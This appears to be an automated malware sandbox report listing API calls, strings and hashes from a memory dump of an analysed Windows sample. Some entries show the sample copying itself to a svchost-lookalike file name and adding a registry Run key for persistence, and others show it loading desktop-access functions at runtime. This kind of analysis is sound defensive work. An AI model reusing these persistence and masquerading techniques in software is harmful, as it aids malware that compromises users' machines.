                                • Opcode Fuzzy Hash: 29e5352d7b70bef5ad88fc4732312c84c6e5fd6fbe6967bf66cd17cc68ceed17
                                • Instruction Fuzzy Hash: C8416879A40308FBE724DFA4CC4AFAE77A5BB44700F204254F911AA2D1C6B8EE80CB54
                                APIs
                                • GlobalLock.KERNEL32(00000000), ref: 00711B80
                                • lstrcmpA.KERNEL32(00000000,006FC5C0), ref: 00711BB2
                                • OpenPrinterA.WINSPOOL.DRV(006FC5C0,006FC5C0,00000000), ref: 00711BCA
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp, xrefs: 00711B94, 00711C10
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: GlobalLockOpenPrinterlstrcmp
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
                                • API String ID: 1499809068-226135187
                                • Opcode ID: 89092c4c4e0950324808605a0c3aa9b3f658bc5c48823191d4227548e06c7bb1
                                • Instruction ID: 9362648928c5e83903c69164ef431895a36aa71c19c02b165841d258e3d816e9
                                • Opcode Fuzzy Hash: 89092c4c4e0950324808605a0c3aa9b3f658bc5c48823191d4227548e06c7bb1
                                • Instruction Fuzzy Hash: DB3191B8A44205EFDB14DFA8C949FAE77B8AF44700F208158F614AB2D1D6B4DD81CBA1
                                APIs
                                • GlobalSize.KERNEL32(00000000), ref: 006F0376
                                • GlobalSize.KERNEL32(00000000), ref: 006F03AA
                                • GlobalLock.KERNEL32(00000000), ref: 006F03C0
                                • GlobalLock.KERNEL32(00000000), ref: 006F03CD
                                • GlobalAlloc.KERNEL32(00002002,?), ref: 006F038E
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • GlobalSize.KERNEL32(00000000), ref: 006F0416
                                • GlobalUnlock.KERNEL32(?), ref: 006F042D
                                • GlobalUnlock.KERNEL32(?), ref: 006F0437
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Global$Size$LockMessageUnlock$AllocPeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemisc.cpp
                                • API String ID: 2778597106-3062874304
                                • Opcode ID: f8e3d6012510a52bf48a681757c9cd751cb55e006071d98550e0ad7cde6e78f7
                                • Instruction ID: ce8f394620a8f4f9fecf5f324a9df6855a5da33995e6e1526407105c85f8ce03
                                • Opcode Fuzzy Hash: f8e3d6012510a52bf48a681757c9cd751cb55e006071d98550e0ad7cde6e78f7
                                • Instruction Fuzzy Hash: F721627A91420CFFDB20EFA4C84DAAE77B5AF58341F10C418FA1596291D774CA81DB61
                                APIs
                                • _memset.LIBCMT ref: 10004EC0
                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 10004ED6
                                • _memset.LIBCMT ref: 10004EF5
                                • CopyFileA.KERNEL32(00000000,?,00000000), ref: 10004F0A
                                • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 10004F25
                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000104), ref: 10004F49
                                • RegCloseKey.ADVAPI32(?), ref: 10004F53
                                Strings
                                • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 10004F1B
                                • C:\Program Files\Common Files\scvhost.exe, xrefs: 10004EE1
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: File_memset$CloseCopyModuleNameOpenValue
                                • String ID: C:\Program Files\Common Files\scvhost.exe$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                • API String ID: 3366615494-1226825942
                                • Opcode ID: a91aa669db30c9a0e11145db3f346e9505ef587da7ef00036003a10cab0b442c
                                • Instruction ID: d31a21c0e8011dbab79e6068b019ba079d614583606ee8cd1f0d035f849709fe
                                • Opcode Fuzzy Hash: a91aa669db30c9a0e11145db3f346e9505ef587da7ef00036003a10cab0b442c
                                • Instruction Fuzzy Hash: 0A114275640318FBEB14D790CC8AFDB7778EB48B41F444154F708AA1C5D6B1AB44CBA1
                                APIs
                                  • Part of subcall function 006D22B0: CoInitialize.OLE32(00000000), ref: 006D22E0
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2322
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D233E
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2375
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D2392
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D23C8
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D23E5
                                • InterlockedIncrement.KERNEL32(00000008), ref: 006EEAA5
                                • InterlockedDecrement.KERNEL32(00000008), ref: 006EEAC7
                                • SysFreeString.OLEAUT32(00000000), ref: 006EEAD8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: String$Convert_com_issue_error_com_util::$Interlocked$DecrementFreeIncrementInitialize
                                • String ID: ','$INSERT INTO Users VALUES('$__atl_condVal$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 2087087973-1574258378
                                • Opcode ID: 02139b04ba8e052b1ca238e8dfd707dfd0ee4017ee11f9c4f2c76e9e6744f294
                                • Instruction ID: 2c35f0d965a1058c8882b3d4ce6268c64f0072866fbddbb75bbaac650c097eee
                                • Opcode Fuzzy Hash: 02139b04ba8e052b1ca238e8dfd707dfd0ee4017ee11f9c4f2c76e9e6744f294
                                • Instruction Fuzzy Hash: EDC14771D41B519BDB20DB6CCC02F9EB3A5AF54324F10860DE529B73C2C7B5AA00CB92
                                APIs
                                  • Part of subcall function 006D22B0: CoInitialize.OLE32(00000000), ref: 006D22E0
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2322
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D233E
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2375
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D2392
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D23C8
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D23E5
                                • InterlockedIncrement.KERNEL32(00912EB8), ref: 006EED93
                                • InterlockedDecrement.KERNEL32(00912EB8), ref: 006EEDB5
                                • SysFreeString.OLEAUT32(00000000), ref: 006EEDC6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: String$Convert_com_issue_error_com_util::$Interlocked$DecrementFreeIncrementInitialize
                                • String ID: ' WHERE UserName='$UPDATE Users SET Pwd='$__atl_condVal$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 2087087973-4112273475
                                • Opcode ID: b411e05cd18eb1ba6053cc1c91a2891e0644defdb2d8bf52783c7e2e26d2271c
                                • Instruction ID: 5f58abdc62d663ce737fed204f30f20a48a075db2e143fa71e163479b6c4b6da
                                • Opcode Fuzzy Hash: b411e05cd18eb1ba6053cc1c91a2891e0644defdb2d8bf52783c7e2e26d2271c
                                • Instruction Fuzzy Hash: D2A149319417519FDB20DB69CC02FDEB3A5EF54724F24860DE525A73C1C775AA00CBA6
                                APIs
                                • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,?,?,?,?,?,?,0090F005,006D1E6D), ref: 0090F545
                                • GetModuleFileNameW.KERNEL32(?,006D1E6D,0090F005,?,?,?,?,?,?,?,?,?,?,0090F005,006D1E6D,?), ref: 0090F562
                                • GetProcAddress.KERNEL32(00000000,PDBOpenValidate5), ref: 0090F5F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressFileModuleNameProcQueryVirtual
                                • String ID: PDBOpenValidate5
                                • API String ID: 3975414188-413491164
                                • Opcode ID: a2ed657bb2184e6739bd3dce7be43fa302c67226854a393ce475812b8e6e2943
                                • Instruction ID: e0c26d955a8e10084a8f6664c58a0f47236decb1aefebe72e689b3fa0a18784f
                                • Opcode Fuzzy Hash: a2ed657bb2184e6739bd3dce7be43fa302c67226854a393ce475812b8e6e2943
                                • Instruction Fuzzy Hash: 22917E7560010A9FDB24DFA4CC94EAEB7BAFF89714F104164E905DB6A0D731EE41CBA1
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarimages.cpp, xrefs: 007E9F9B
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarimages.cpp
                                • API String ID: 0-2040512386
                                • Opcode ID: 55bc4b3d2b8a684807049ffa96b19824b7b875f189b419ab7e33f47a7c5b027a
                                • Instruction ID: 2b8805bd512a77c94c17d226a663b8c6f1bbdf0e20deabb744f7a0396998c8b7
                                • Opcode Fuzzy Hash: 55bc4b3d2b8a684807049ffa96b19824b7b875f189b419ab7e33f47a7c5b027a
                                • Instruction Fuzzy Hash: 84A1097191524CEFCB14DFE8CC98BEEB7B5BF48310F208218E516AB290DB386946CB51
                                APIs
                                • BeginDeferWindowPos.USER32(00000008), ref: 006FB9A1
                                • GetTopWindow.USER32(?), ref: 006FB9BA
                                • GetDlgCtrlID.USER32(00000000), ref: 006FB9E0
                                • SendMessageA.USER32(00000000,00000361,00000000,00000000), ref: 006FBA2A
                                • CopyRect.USER32(00000000,?), ref: 006FBA67
                                • EndDeferWindowPos.USER32(00000000), ref: 006FBB48
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageWindow$Defer$BeginCopyCtrlPeekPostQuitRectSend
                                • String ID: Warning: DeferWindowPos failed - low system resources.$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 2121860725-2826988150
                                • Opcode ID: 8cf7aed36a2eed3275fc793f40f649ac6818dcd9e0ad45c9f3fdcc915ea363a7
                                • Instruction ID: dbc138ae7e153eec0fe9eebd0e3c843a58682177b36cccf5b47671f13392d963
                                • Opcode Fuzzy Hash: 8cf7aed36a2eed3275fc793f40f649ac6818dcd9e0ad45c9f3fdcc915ea363a7
                                • Instruction Fuzzy Hash: 65912A75A0020DDFCB14DFA8C986BEEB7B6FF48310F149119EA15AB384D774A941CBA4
                                APIs
                                  • Part of subcall function 006F5BE0: GetWindowLongA.USER32(00000000,000000F0), ref: 006F5C2A
                                  • Part of subcall function 006F5BE0: GetParent.USER32(00000000), ref: 006F5C3B
                                  • Part of subcall function 006F5BE0: GetLastActivePopup.USER32(00000000), ref: 006F5C81
                                  • Part of subcall function 006F5BE0: IsWindowEnabled.USER32(00000000), ref: 006F5C9A
                                  • Part of subcall function 006F5BE0: EnableWindow.USER32(00000000,00000000), ref: 006F5CBA
                                • EnableWindow.USER32(?,00000001), ref: 006F588A
                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 006F58B2
                                • GetCurrentProcessId.KERNEL32 ref: 006F58C1
                                • SendMessageA.USER32(00000000,00000376,00000000,00000000), ref: 006F58DF
                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 006F5A00
                                • EnableWindow.USER32(00000000,00000001), ref: 006F5A69
                                Strings
                                • Warning: no icon specified for message box., xrefs: 006F599E
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui1.cpp, xrefs: 006F59B2
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastLongMessageModuleNameParentPopupSendThread
                                • String ID: Warning: no icon specified for message box.$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui1.cpp
                                • API String ID: 2462427179-3878657793
                                • Opcode ID: c3af20172781e1a40a3c6d02e4d491135d657646a54c96119a4f7eb7644b7119
                                • Instruction ID: 5c7837fce74c5496e83ab0f02df24c537c8fd4ffe69336b29a236fca1bed434d
                                • Opcode Fuzzy Hash: c3af20172781e1a40a3c6d02e4d491135d657646a54c96119a4f7eb7644b7119
                                • Instruction Fuzzy Hash: 2A61077090421CDFDB29DF14CC56BE9B7B6BB48301F0045D9E70AAA280D7B09E91CF95
                                APIs
                                • GetParent.USER32(00000000), ref: 006FBBDA
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • GetWindowRect.USER32(00000000,00000000), ref: 006FBC25
                                • ScreenToClient.USER32(00000000,00000000), ref: 006FBC38
                                • ScreenToClient.USER32(00000000,00000000), ref: 006FBC4B
                                • EqualRect.USER32(00000000,00000000), ref: 006FBC5E
                                • DeferWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,?,00000014), ref: 006FBCA4
                                • SetWindowPos.USER32(00000000,00000000,00000000,?,?,?,00000014), ref: 006FBCDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$ClientMessageRectScreen$DeferEqualParentPeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 1825309770-4102074842
                                • Opcode ID: 81cb1e18833a912eaec4427c2009cf2a22419acc1f327da6c56212d513fbd134
                                • Instruction ID: f75eeb71f7deb23ec1d6fcc8bfc81d1c008ade6300f526f95ead4f5f167c66e6
                                • Opcode Fuzzy Hash: 81cb1e18833a912eaec4427c2009cf2a22419acc1f327da6c56212d513fbd134
                                • Instruction Fuzzy Hash: AB410C7560020EEFDB14DFA4C999EAF77BABF88301F108518FA1997295DB34E941CB60
                                APIs
                                • RealChildWindowFromPoint.USER32(00000000,?,006F809B,?,?,?,006F809B,?), ref: 0072D955
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • ClientToScreen.USER32(00000000,?), ref: 0072D97E
                                • GetWindow.USER32(00000000,00000005), ref: 0072D98A
                                • GetWindow.USER32(00000000,00000002), ref: 0072D99B
                                • GetDlgCtrlID.USER32(00000000), ref: 0072D9AE
                                • GetWindowLongA.USER32(00000000,000000F0), ref: 0072D9C1
                                • GetWindowRect.USER32(00000000,00000000), ref: 0072D9E3
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winutil.cpp, xrefs: 0072D93A
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$Message$ChildClientCtrlFromLongPeekPointPostQuitRealRectScreen
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winutil.cpp
                                • API String ID: 2567065104-1334628715
                                • Opcode ID: 841f58e54ec0dbe98064a8751bfeea5b405766a2bf963131a4aab5ececd0ab4d
                                • Instruction ID: accf74d3faf21efd38faf513a5c3ac51505e7643ba6ae6cec71c80d2aff18b4c
                                • Opcode Fuzzy Hash: 841f58e54ec0dbe98064a8751bfeea5b405766a2bf963131a4aab5ececd0ab4d
                                • Instruction Fuzzy Hash: 8B316F75914208FFCB24DFA4E889EAE77B4FF48301F208558F90697290DB38AE81DB50
                                APIs
                                • GetWindowLongA.USER32(00000000,000000F0), ref: 006F5C2A
                                • GetParent.USER32(00000000), ref: 006F5C3B
                                • GetLastActivePopup.USER32(00000000), ref: 006F5C81
                                • IsWindowEnabled.USER32(00000000), ref: 006F5C9A
                                • EnableWindow.USER32(00000000,00000000), ref: 006F5CBA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$ActiveEnableEnabledLastLongParentPopup
                                • String ID: mXo$mXo
                                • API String ID: 3478561868-1283609554
                                • Opcode ID: 2523a2dba5efe55e9007b67c515ce25aeecf907b8180a73b3343c3c90f9f1a4e
                                • Instruction ID: adc31b0733ff9c2cc8c180222c8559c3f053f3fbdb1a5adc5d399962a999c956
                                • Opcode Fuzzy Hash: 2523a2dba5efe55e9007b67c515ce25aeecf907b8180a73b3343c3c90f9f1a4e
                                • Instruction Fuzzy Hash: 6731B175D04608EFCB14DFA4C548AADBBB6EB44301F208599AA17A7390C7349E81EB41
                                APIs
                                • LoadLibraryA.KERNEL32(user32.dll,?,?,?), ref: 100070F8
                                • GetProcAddress.KERNEL32(00000000,OpenInputDesktop), ref: 1000710F
                                • GetProcAddress.KERNEL32(00000000,OpenDesktopA), ref: 1000711A
                                • GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 10007124
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: CloseDesktop$OpenDesktopA$OpenInputDesktop$user32.dll
                                • API String ID: 2238633743-3711086354
                                • Opcode ID: bb8e420e63281623922e0671375ee86f6f08b8d82af0a50321b89ee959569d1a
                                • Instruction ID: e04073a47f4108027bd97d6a21499a342be3e98b4923ae7eeeb7cc36402c21cf
                                • Opcode Fuzzy Hash: bb8e420e63281623922e0671375ee86f6f08b8d82af0a50321b89ee959569d1a
                                • Instruction Fuzzy Hash: DC11B275D00219ABEB10DFA9CC44BEEBAF8FF49764F104129F914A7280D77999018AA5
                                APIs
                                • GetSysColor.USER32(0000000F), ref: 0071FA4B
                                • GetSysColor.USER32(00000010), ref: 0071FA59
                                • GetSysColor.USER32(00000014), ref: 0071FA67
                                • GetSysColor.USER32(00000012), ref: 0071FA75
                                • GetSysColor.USER32(00000006), ref: 0071FA83
                                • GetSysColorBrush.USER32(0000000F), ref: 0071FA91
                                • GetSysColorBrush.USER32(00000006), ref: 0071FAB9
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp, xrefs: 0071FAA8, 0071FAD0
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
